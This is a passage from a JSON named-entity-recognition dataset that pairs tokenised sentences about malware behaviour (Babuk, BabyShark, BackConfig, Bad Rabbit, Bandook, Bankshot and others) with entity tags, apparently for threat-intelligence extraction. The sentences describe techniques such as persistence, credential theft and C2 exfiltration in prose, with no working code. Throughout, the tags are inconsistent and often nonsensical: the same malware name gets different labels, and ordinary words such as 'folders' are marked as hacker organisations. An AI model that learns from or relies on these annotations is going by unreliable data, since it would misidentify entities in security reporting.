"B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Babuk", "can", "enumerate", "disk", "volumes,", "get", "disk", "information,", "and", "query", "service", "status." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Babuk", "can", "use", "“WNetOpenEnumW”", "and", "“WNetEnumResourceW”", "to", "enumerate", "files", "in", "network", "resources", "for", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "can", "enumerate", "all", "services", "running", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "has", "the", "ability", "to", "use", "the", "command", "line", "to", "control", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "the", "ability", "to", "decode", "downloaded", "files", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "cleaned", "up", "all", "files", "associated", "with", "the", "secondary", "payload", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "used", "<code>dir</code>", "to", "search", "for", "\"programfiles\"", "and", "\"appdata\"." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "downloaded", "additional", "files", "from", "the", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "a", "PowerShell-based", "remote", "administration", "ability", "that", "can", "implement", "a", "PowerShell", "or", "C#", "based", "keylogger." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BabyShark", "has", "used", "mshta.exe", "to", "download", "and", "execute", "applications", "from", "a", "remote", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "executed", "the", "<code>tasklist</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "executed", "the", "<code>reg", "query</code>", "command", "for", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal", "Server", "Client\\Default</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "added", "a", "Registry", "key", "to", "ensure", "all", "future", "macros", "are", "enabled", "for", "Microsoft", "Word", "and", "Excel", "as", "well", "as", "for", "additional", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "used", "scheduled", "tasks", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "encoded", "data", "using", "certutil", "before", "exfiltration." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "executed", "the", "<code>ver</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "executed", "the", "<code>ipconfig", "/all</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "executed", "the", "<code>whoami</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BabyShark", "has", "used", "cmd.exe", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "been", "signed", "with", "self", "signed", "digital", "certificates", "mimicking", "a", "legitimate", "software", "company." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Org" ] }, { "tokens": [ "BackConfig", "has", "used", "compressed", "and", "decimal", "encoded", "VBS", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "BackConfig", "has", "used", "a", "custom", "routine", "to", "decrypt", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "remove", "files", "and", "folders", "related", "to", "previous", "infections." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "identify", "folders", "and", "files", "related", "to", "previous", "infections." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "set", "folders", "or", "files", "to", "be", "hidden", "from", "the", "Windows", "Explorer", "default", "view." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "can", "download", "and", "execute", "additional", "payloads", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "compromised", "victims", "via", "links", "to", "URLs", "hosting", "malicious", "content." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "hidden", "malicious", "payloads", "in", "<code>%USERPROFILE%\\Adobe\\Driver\\dwg\\</code>", "and", "mimicked", "the", "legitimate", "DHCP", "service", "binary." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "can", "leverage", "API", "functions", "such", "as", "<code>ShellExecuteA</code>", "and", "<code>HttpOpenRequestA</code>", "in", "the", "process", "of", "downloading", "and", "executing", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "use", "hidden", "columns", "in", "Excel", "spreadsheets", "to", "store", "executable", "files", "or", "commands", "for", "VBA", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "B-Way", "O", "B-Way", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "use", "scheduled", "tasks", "to", "repeatedly", "execute", "malicious", "payloads", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "gather", "the", "victim's", "computer", "name." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "used", "VBS", "to", "install", "its", "downloader", "component", "and", "malicious", "documents", "with", "VBA", "macro", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "has", "the", "ability", "to", "use", "HTTPS", "for", "C2", "communiations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BackConfig", "can", "download", "and", "run", "batch", "files", "to", "execute", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "writes", "collected", "data", "to", "a", "temporary", "file", "in", "an", "encrypted", "form", "before", "exfiltration", "to", "a", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Backdoor.Oldrea", "samples", "contain", "a", "publicly", "available", "Web", "browser", "password", "recovery", "tool." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "collects", "address", "book", "information", "from", "Outlook." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "contains", "a", "cleanup", "module", "that", "removes", "traces", "of", "itself", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "collects", "information", "about", "available", "drives,", "default", "browser,", "desktop", "file", "list,", "My", "Documents,", "Internet", "history,", "program", "files,", "and", "root", "of", "available", "drives.", "It", "also", "searches", "for", "ICS-related", "software", "files." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "can", "download", "additional", "modules", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "can", "use", "a", "network", "scanning", "module", "to", "identify", "ICS-related", "ports." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "collects", "information", "about", "running", "processes." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "injects", "itself", "into", "explorer.exe." ], "ner_tags": [ "B-Way", "B-Way", "I-Way", "O", "B-SamFile" ] }, { "tokens": [ "Backdoor.Oldrea", "adds", "Registry", "Run", "keys", "to", "achieve", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "can", "enumerate", "and", "map", "ICS-specific", "systems", "in", "victim", "environments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "can", "use", "rundll32", "for", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Backdoor.Oldrea", "samples", "use", "standard", "Base64", "+", "bzip2,", "and", "some", "use", "standard", "Base64", "+", "reverse", "XOR", "+", "RSA-2048", "to", "decrypt", "data", "received", "from", "C2", "servers." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "collects", "information", "about", "the", "OS", "and", "computer", "name." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "collects", "information", "about", "the", "Internet", "adapter", "configuration." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Backdoor.Oldrea", "collects", "the", "current", "username", "from", "the", "victim." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "attempted", "to", "bypass", "UAC", "and", "gain", "elevated", "administrative", "privileges." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "encrypted", "files", "and", "disks", "using", "AES-128-CBC", "and", "RSA-2048." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Bad", "Rabbit", "spread", "through", "watering", "holes", "on", "popular", "sites", "by", "injecting", "JavaScript", "into", "the", "HTML", "body", "or", "a", "<code>.js</code>", "file." ], "ner_tags": [ "B-Tool", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "used", "the", "EternalRomance", "SMB", "exploit", "to", "spread", "through", "victim", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Features", "B-Features", "B-Exp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "used", "an", "executable", "that", "installs", "a", "modified", "bootloader", "to", "prevent", "normal", "boot-up." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "used", "Mimikatz", "to", "harvest", "credentials", "from", "the", "victim's", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "been", "executed", "through", "user", "installation", "of", "an", "executable", "disguised", "as", "a", "flash", "installer." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "masqueraded", "as", "a", "Flash", "Player", "installer", "through", "the", "executable", "file", "<code>install_flash_player.exe</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Bad", "Rabbit", "has", "used", "various", "Windows", "API", "calls." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "enumerates", "open", "SMB", "shares", "on", "internal", "victim", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit’s", "<code>infpub.dat</code>", "file", "uses", "NTLM", "login", "credentials", "to", "brute", "force", "Windows", "machines." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "can", "enumerate", "all", "running", "processes", "to", "compare", "hashes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "has", "used", "rundll32", "to", "launch", "a", "malicious", "DLL", "as", "<code>C:Windowsinfpub.dat</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "B-SamFile" ] }, { "tokens": [ "Bad", "Rabbit’s", "<code>infpub.dat</code>", "file", "creates", "a", "scheduled", "task", "to", "launch", "a", "malicious", "executable." ], "ner_tags": [ "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bad", "Rabbit", "drops", "a", "file", "named", "<code>infpub.dat</code>into", "the", "Windows", "directory", "and", "is", "executed", "through", "SCManager", "and", "<code>rundll.exe</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BadPatch", "collects", "files", "from", "the", "local", "system", "that", "have", "the", "following", "extensions,", "then", "prepares", "them", "for", "exfiltration:", ".xls,", ".xlsx,", ".pdf,", ".mdb,", ".rar,", ".zip,", ".doc,", ".docx." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "BadPatch", "searches", "for", "files", "with", "specific", "file", "extensions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "can", "download", "and", "execute", "or", "update", "malware." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "BadPatch", "has", "a", "keylogging", "capability." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "stores", "collected", "data", "in", "log", "files", "before", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "uses", "SMTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BadPatch", "establishes", "a", "foothold", "by", "adding", "a", "link", "to", "the", "malware", "executable", "in", "the", "startup", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "captures", "screenshots", "in", ".jpg", "format", "and", "then", "exfiltrates", "them." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "uses", "WMI", "to", "enumerate", "installed", "security", "products", "in", "the", "victim’s", "environment." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "attempts", "to", "detect", "if", "it", "is", "being", "run", "in", "a", "Virtual", "Machine", "(VM)", "using", "a", "WMI", "query", "for", "disk", "drive", "name,", "BIOS,", "and", "motherboard", "information." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "collects", "the", "OS", "system,", "OS", "version,", "MAC", "address,", "and", "the", "computer", "name", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BadPatch", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Bandook", "has", "modules", "that", "are", "capable", "of", "capturing", "audio." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Bandook", "was", "signed", "with", "valid", "Certum", "certificates." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "can", "support", "commands", "to", "execute", "Java-based", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "can", "collect", "local", "files", "from", "the", "system", "." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "decoded", "its", "PowerShell", "script." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Bandook", "can", "upload", "files", "from", "a", "victim's", "machine", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "a", "command", "to", "delete", "a", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "a", "command", "to", "list", "files", "on", "a", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Bandook", "can", "download", "files", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Bandook", "contains", "keylogging", "capabilities." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "used", "lure", "documents", "to", "convince", "the", "user", "to", "enable", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "used", "the", "ShellExecuteW()", "function", "call." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Bandook", "has", "a", "command", "built", "in", "to", "use", "a", "raw", "TCP", "socket." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O" ] }, { "tokens": [ "Bandook", "can", "detect", "USB", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "used", "PowerShell", "loaders", "as", "part", "of", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "been", "launched", "by", "starting", "iexplore.exe", "and", "replacing", "it", "with", "Bandook's", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "can", "support", "commands", "to", "execute", "Python-based", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "is", "capable", "of", "taking", "an", "image", "of", "and", "uploading", "the", "current", "desktop." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Bandook", "is", "delivered", "via", "a", "malicious", "Word", "document", "inside", "a", "zip", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "used", ".PNG", "images", "within", "a", "zip", "file", "to", "build", "the", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Bandook", "has", "used", "AES", "encryption", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Bandook", "can", "collect", "information", "about", "the", "drives", "available", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "a", "command", "to", "get", "the", "public", "IP", "address", "from", "a", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "modules", "that", "are", "capable", "of", "capturing", "video", "from", "a", "victim's", "webcam." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "has", "used", "malicious", "VBA", "code", "against", "the", "target", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bandook", "is", "capable", "of", "spawning", "a", "Windows", "command", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "recursively", "generates", "a", "list", "of", "files", "within", "a", "directory", "and", "sends", "them", "back", "to", "the", "control", "server." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "grabs", "a", "user", "token", "using", "WTSQueryUserToken", "and", "then", "creates", "a", "process", "by", "impersonating", "a", "logged-on", "user." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "collects", "files", "from", "the", "local", "system." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "decodes", "embedded", "XOR", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "gathers", "domain", "and", "account", "names/information", "through", "process", "monitoring." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "exfiltrates", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "leverages", "a", "known", "zero-day", "vulnerability", "in", "Adobe", "Flash", "to", "execute", "the", "implant", "into", "the", "victims’", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "marks", "files", "to", "be", "deleted", "upon", "the", "next", "system", "reboot", "and", "uninstalls", "and", "removes", "itself", "from", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "searches", "for", "files", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "deletes", "all", "artifacts", "associated", "with", "the", "malware", "from", "the", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "uploads", "files", "and", "secondary", "payloads", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "B-HackOrg", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "gathers", "domain", "and", "account", "names/information", "through", "process", "monitoring." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "writes", "data", "into", "the", "Registry", "key", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Bankshot", "creates", "processes", "using", "the", "Windows", "API", "calls:", "CreateProcessA()", "and", "CreateProcessAsUserA()." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Bankshot", "encodes", "commands", "from", "the", "control", "server", "using", "a", "range", "of", "characters", "and", "gzip." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "binds", "and", "listens", "on", "port", "1058", "for", "HTTP", "traffic", "while", "also", "utilizing", "a", "FakeTLS", "method." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Bankshot", "identifies", "processes", "and", "collects", "the", "process", "ids." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "generates", "a", "false", "TLS", "handshake", "using", "a", "public", "certificate", "to", "disguise", "C2", "network", "communications." ], "ner_tags": [ "B-Way", "O", "O", "I-Way", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "searches", "for", "certain", "Registry", "keys", "to", "be", "configured", "before", "executing", "the", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "gathers", "system", "information,", "network", "addresses,", "disk", "type,", "disk", "free", "space,", "and", "the", "operation", "system", "version." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "I-Features", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "modifies", "the", "time", "of", "a", "file", "as", "specified", "by", "the", "control", "server." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "uses", "HTTP", "for", "command", "and", "control", "communication." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bankshot", "uses", "the", "command-line", "interface", "to", "execute", "arbitrary", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ 